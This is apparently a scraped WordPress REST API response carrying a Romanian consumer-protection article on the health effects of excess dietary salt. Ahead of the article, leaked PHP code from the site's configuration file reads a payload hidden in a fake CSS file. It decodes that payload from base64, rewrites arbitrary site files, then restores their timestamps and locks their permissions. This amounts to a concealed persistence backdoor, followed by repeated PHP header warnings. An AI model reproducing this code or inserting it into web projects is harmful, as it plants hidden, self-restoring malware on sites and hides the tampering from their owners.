$wp_update_file="/home/shuffles/public_html/wp-includes/css/wp-timer.css"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } }
Warning: Cannot modify header information - headers already sent by (output started at /home/shuffles/public_html/wp-config.php:78) in /home/shuffles/public_html/wp-includes/rest-api/class-wp-rest-server.php on line 1794

Warning: Cannot modify header information - headers already sent by (output started at /home/shuffles/public_html/wp-config.php:78) in /home/shuffles/public_html/wp-includes/rest-api/class-wp-rest-server.php on line 1794

Warning: Cannot modify header information - headers already sent by (output started at /home/shuffles/public_html/wp-config.php:78) in /home/shuffles/public_html/wp-includes/rest-api/class-wp-rest-server.php on line 1794

Warning: Cannot modify header information - headers already sent by (output started at /home/shuffles/public_html/wp-config.php:78) in /home/shuffles/public_html/wp-includes/rest-api/class-wp-rest-server.php on line 1794

Warning: Cannot modify header information - headers already sent by (output started at /home/shuffles/public_html/wp-config.php:78) in /home/shuffles/public_html/wp-includes/rest-api/class-wp-rest-server.php on line 1794

Warning: Cannot modify header information - headers already sent by (output started at /home/shuffles/public_html/wp-config.php:78) in /home/shuffles/public_html/wp-includes/rest-api/class-wp-rest-server.php on line 1794

Warning: Cannot modify header information - headers already sent by (output started at /home/shuffles/public_html/wp-config.php:78) in /home/shuffles/public_html/wp-includes/rest-api/class-wp-rest-server.php on line 1794

Warning: Cannot modify header information - headers already sent by (output started at /home/shuffles/public_html/wp-config.php:78) in /home/shuffles/public_html/wp-includes/rest-api/class-wp-rest-server.php on line 1794
{"id":5182,"date":"2012-04-04T12:00:49","date_gmt":"2012-04-04T11:00:49","guid":{"rendered":"http:\/\/o9atitudine.ro\/comunicate\/sarea-in-exces-afecteaza-sanatatea"},"modified":"2012-04-04T12:00:49","modified_gmt":"2012-04-04T11:00:49","slug":"sarea-in-exces-afecteaza-sanatatea","status":"publish","type":"post","link":"http:\/\/o9atitudine.ro\/comunicate\/sarea-in-exces-afecteaza-sanatatea\/","title":{"rendered":"InfoCons: Sarea In Exces Afecteaza Sanatatea"},"content":{"rendered":"

\n\tSarea (clorura de sodiu) este cea mai banal\u0103 \u015fi indispensabil\u0103 prezen\u0163\u0103 din farfuria noastr\u0103. Sarea se extrage din depozite subterane (formate din fostele m\u0103ri), din mare (apa m\u0103rii are 3% sare) sau din lacuri s\u0103rate.<\/p>\n

\n\tSodiul este cationul major al spa\u0163iului extracelular, unde se afl\u0103 2\/3 din cantitatea total\u0103 din organismul uman (mai ales \u00een plasm\u0103, \u0163esutul nervos \u015fi muscular); restul de circa 35-40% este \u00eencorporat\u0103 \u00een compu\u015fi anorganici la nivelul oaselor, schimbul cu sodiul aflat \u00een fluidele organismului fiind de mic\u0103 amploare \u015fi vitez\u0103. Unele secre\u0163ii digestive (bila \u015fi secre\u0163iile pancreatice) con\u0163in cantit\u0103\u0163i importante de sodiu; dimpotriv\u0103, secre\u0163ia glandelor sudoripare este hipotonic\u0103 \u015fi con\u0163ine cantit\u0103\u0163i relativ reduse de sodiu.<\/p>\n

\n\tDatorit\u0103 existen\u0163ei unui mare num\u0103r de mecanisme implicate \u00een conservarea\/eliminarea sodiului din organism, nu exist\u0103 o valoare statuat\u0103 a necesarului specific. Un aport de 500 mg\/zi – chiar 200 mg\/zi dup\u0103 al\u0163i autori – este adecvat \u015fi sigur pentru toate persoanele peste 18 ani pentru acoperirea pierderilor, indiferent de varia\u0163iile existente \u00een activitatea fizic\u0103 \u015fi climat, care influen\u0163eaz\u0103 elimin\u0103rile prin transpira\u0163ie.<\/p>\n

\n\tUltimele cifre aflate \u00een circula\u0163ie pentru aportul zilnic maxim recomandabil de sodiu se bazeaz\u0103 pe rolul poten\u0163ial al excesului de sodiu \u00een patogeneza hipertensiunii arteriale.<\/p>\n

\n\tSursele alimentare de sodiu sunt reprezentate \u00een principal de alimentele \u015fi b\u0103uturile ce con\u0163in clorur\u0103 de sodiu. \u00cen general, con\u0163inutul natural de sodiu al alimentelor bogate \u00een proteine (lapte, br\u00e2nz\u0103, ou\u0103, carne, pe\u015fte) este mai mare dec\u00e2t cel al legumelor \u015fi cerealelor, \u00een timp ce fructele con\u0163in pu\u0163in sau deloc sodiu.<\/p>\n

\n\tAdaosul ulterior de conservan\u0163i, condimente, arome \u015fi sare alimentar\u0103 cre\u015fte mult con\u0163inutul sodic al alimentelor \u00een cursul proces\u0103rii industriale; numai 10% din cantitatea total\u0103 de sare ingerat\u0103 de un adult provine din con\u0163inutul natural de sare al alimentelor, 15% – din sarea ad\u0103ugat\u0103 la g\u0103tit sau la mas\u0103 \u015fi 75% – din sarea ad\u0103ugat\u0103 \u00een timpul proceselor de procesare industrial\u0103 a alimentelor. Alte surse<\/p>\n

\n\talimentare de sodiu sunt constituite de componente alimentare precum bicarbonatul de sodiu \u015fi glutamatul monosodic \u015fi de apa comunitar\u0103, ambele categorii aduc\u00e2nd \u00eens\u0103 c\u00e2te un aport de sub 10% din aportul zilnic de sodiu.<\/p>\n

\n\tSodiul intervine \u00een balan\u0163a hidric\u0103 a organismului, protej\u00e2nd volumul spa\u0163iului extracelular, \u00een echilibrul acido-bazic, \u00een permeabilitatea celular\u0103 a materialelor metabolice (prin pompa de sodiu – Na+-K+-ATP-aza) \u015fi \u00een excitabilitatea muscular\u0103.<\/p>\n

\n\tConsecin\u0163ele deficitului de sodiu: hiponatremia – indus\u0103 de transpira\u0163ii excesive, diaree sau v\u0103rs\u0103turi persistente, arsuri, boli renale – determin\u0103 hipoosmolaritatea compartimentului plasmatic, antren\u00e2nd trecerea apei \u00een compartimentul tisular, cu hiperhidratare \u015fi edem celular, mai evident la nivel cerebral.<\/p>\n

\n\tSunt prezente semne de suferin\u0163\u0103 nervoas\u0103 central\u0103 difuz\u0103: inapeten\u0163\u0103, cefalee, v\u0103rs\u0103turi, alter\u0103ri ale capacit\u0103\u0163ii de concentrare, memoriei \u015fi st\u0103rii de cuno\u015ftin\u0163\u0103 \u015fi convulsii generalizate.<\/p>\n

\n\tConsecin\u0163ele excesului de sodiu: hipernatremia – determinat\u0103 de cre\u015fterea capitalului de sodiu al organismului (prin cre\u015fterea aportului \u015fi\/sau elimin\u0103ri sc\u0103zute de sodiu la nivel renal) sau din pierderea de ap\u0103 f\u0103r\u0103 pierdere propor\u0163ional\u0103 asociat\u0103 de sodiu – induce ie\u015firea apei din celule \u015fi sc\u0103derea volumului spa\u0163iului intracelular; semnele clinice const\u0103 \u00een acest caz din sete intens\u0103, eventual<\/p>\n

\n\tpoliurie \u015fi, mai ales, semne neurologice (explicabile prin reducerea volumului celulelor cerebrale). Aportul cronic crescut de sare (clorur\u0103 de sodiu) pare s\u0103 aib\u0103 leg\u0103tur\u0103 cu cre\u015fterea valorilor tensionale, mai ales la anumite grupuri popula\u0163ionale (aproximativ 10% din popula\u0163ia general\u0103), la care reducerea<\/p>\n

\n\taportului sodic poate fi \u00eendeosebi util\u0103 pentru reducerea tensiunii arteriale (a\u015fa numitele cazuri de „sensibilitate la sare”).<\/p>\n

\n\tConsumul intermitent de alimente s\u0103rate produce mai degrab\u0103 edeme \u015fi nu hipertensiune arterial\u0103.<\/p>\n

\n\tSe admite tot mai des faptul ca excesul de sare este responsabil de cat mai multe decese in fiecare an. Principalul vinovat se pare ca este nu numai consumul exagerat al sarii pe care o foloseste fiecare in bucatarie atunci cand gateste, dar si industria alimentara care pune prea multa sare in mancarurile semipreparate si alte produse.<\/p>\n

\n\tIn mod cert, sarea este cunoscuta ca un factor de risc la hipertensivi, dar se afla si la originea a numeroase probleme de sanatate, in special la nou-nascuti, persoane varstnice sau la supraponderali. Nevoia fiziologica minimala de sare este in jurul a 2 grame\/zi. Desi dezbaterile asupra efectelor negative ale excesului de sare in alimentatie sunt departe de a fi solutionate, se stie clar ca este necesar sa diminuam consumul de sare. Aceasta deoarece sarea contribuie la cresterea tensiunii arteriale la unele persoane: atat la cei care sufera deja de aceasta afectiune, cat si la cei predispusi (persoane peste 40 de ani, supraponderale si cu antecedente familiale de hipertensiune). Sarea este implicata si in aparitia altor boli cardiovasculare si a osteoporozei.<\/p>\n

\n\tPe timpul verii este important sa reducem, nu sa suprimam, consumul de sare, deoarece in timpul verii prin transpiratie au loc pierderi de sare care pot conduce la o carenta sodata. Aceasta se manifesta prin pierderi de cunostinta, crampe musculare, insomnie sideshidratare. Anumite boli, in special cele renale, antreneaza un dezechilibru al sodiului in sange si grave tulburari metabolice.<\/p>\n

\n\tSursa: asociatia de Protectia Consumatorilor<\/p>\n

\n\t\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0\u00a0Asociatia Nationala pentru Protectia Consumatorilor si Promovarea Programelor si Strategiilor din Romania<\/p>\n

\n\t\u00a0<\/p>\n","protected":false},"excerpt":{"rendered":"

\n\t\u00a0<\/p>\n

\n\tSAREA IN EXCES AFECTEAZA SANATATEA<\/strong><\/p>\n

\n\tPentru a putea func\u0163iona normal, organismul uman necesit\u0103 un aport constant de energie, aport care se realizeaz\u0103 prin intermediul principiilor alimentare.<\/p>\n

\n\t\"alt\"<\/p>\n

\n\tFiind vorba de un organism homeoterm, adic\u0103 lipsit de capacitatea de depozitare a c\u0103ldurii \u015fi de posibilitatea de transformare a altei forme de energie\u00a0 exterioar\u0103, sursa unic\u0103 \u015fi indispensabil\u0103 a supravie\u0163uirii omului r\u0103m\u00e2ne energia ob\u0163inut\u0103 prin desfacerea leg\u0103turilor chimice din structura alimentelor.<\/p>\n

\n\tStarea de s\u0103n\u0103tate a fiec\u0103rui individ, evaluat\u0103 adesea prin ceea ce se numeste un status nutri\u0163ional optim deriv\u0103 din echilibrul ob\u0163inut \u00eentre necesarul \u015fi aportul nutri\u0163ional. Existen\u0163a unui st\u0103ri de nutri\u0163ie optime promoveaz\u0103 cre\u015fterea \u015fi dezvoltarea organismului, men\u0163ine starea de s\u0103n\u0103tate, permite desf\u0103\u015furarea activit\u0103\u0163ii zilnice \u015fi particip\u0103 la protec\u0163ia organismului fa\u0163\u0103 de diverse agresiuni sau boli.<\/p>\n","protected":false},"author":8,"featured_media":5181,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"_links":{"self":[{"href":"http:\/\/o9atitudine.ro\/wp-json\/wp\/v2\/posts\/5182"}],"collection":[{"href":"http:\/\/o9atitudine.ro\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/o9atitudine.ro\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/o9atitudine.ro\/wp-json\/wp\/v2\/users\/8"}],"replies":[{"embeddable":true,"href":"http:\/\/o9atitudine.ro\/wp-json\/wp\/v2\/comments?post=5182"}],"version-history":[{"count":0,"href":"http:\/\/o9atitudine.ro\/wp-json\/wp\/v2\/posts\/5182\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/o9atitudine.ro\/wp-json\/wp\/v2\/media\/5181"}],"wp:attachment":[{"href":"http:\/\/o9atitudine.ro\/wp-json\/wp\/v2\/media?parent=5182"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/o9atitudine.ro\/wp-json\/wp\/v2\/categories?post=5182"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/o9atitudine.ro\/wp-json\/wp\/v2\/tags?post=5182"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}